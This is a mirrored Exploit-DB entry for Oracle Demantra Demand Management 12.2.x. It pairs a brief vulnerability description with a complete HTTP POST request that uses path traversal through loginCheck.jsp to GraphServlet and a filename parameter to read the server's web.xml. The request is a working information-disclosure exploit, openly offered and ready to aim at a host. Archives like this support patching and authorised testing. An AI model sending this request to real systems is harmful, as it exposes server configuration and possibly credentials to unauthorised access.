bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/39018.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
928 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/64836/info
Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
Attackers can exploit this issue to obtain sensitive information.
This vulnerability affects the following supported versions:
12.2.0, 12.2.1, 12.2.2
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
Reference in a new issue View git blame Copy permalink